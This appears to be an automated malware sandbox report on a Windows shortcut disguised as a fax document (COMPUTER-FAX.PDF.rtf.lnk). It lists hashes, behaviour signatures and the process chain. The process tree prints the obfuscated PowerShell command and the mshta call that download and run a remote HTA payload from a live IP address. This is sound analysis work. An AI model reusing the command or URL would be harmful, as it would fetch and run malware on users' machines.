Overview

overview

10

Static

static

1

COMPUTER-F...tf.lnk

windows7-x64

10

COMPUTER-F...tf.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    10/05/2024, 16:25

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    COMPUTER-FAX.PDF.rtf.lnk

  • Size

    2KB

  • MD5

    79877bc985de86df896986574cc1df56

  • SHA1

    424d3990f1802955a01557691e02bb69699ba3bc

  • SHA256

    b716f1e8540340c6a269ee25aa67cb7af7366c3c2c8223dfcf4240de5bc6e7de

  • SHA512

    96186acb36a3770ca2d97c272d0c5785f9c8d40e082a7093cc7a97249dcb16502cde1abea263f1a41b2fb49f1ab9ecc1d88f7e81ebaa79834ff98e644d81f51b

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://13.75.76.78/stfx/out-454148433.hta

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\COMPUTER-FAX.PDF.rtf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2208
    • C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$rp=[string][char[]]@(0x68,0x74,0x74,0x70) -replace ' ','';$rp=$rp+'://13.75.76.78/stfx/out-454148433.hta';mshta $rp"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2424
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" http://13.75.76.78/stfx/out-454148433.hta
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        PID:2632

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2424-38-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2424-40-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2424-39-0x000000001B530000-0x000000001B812000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/2424-42-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2424-41-0x0000000002950000-0x0000000002958000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2424-43-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2424-44-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2424-45-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2424-46-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2632-61-0x000007FFFFF80000-0x000007FFFFF90000-memory.dmp

          Filesize

          64KB

          Download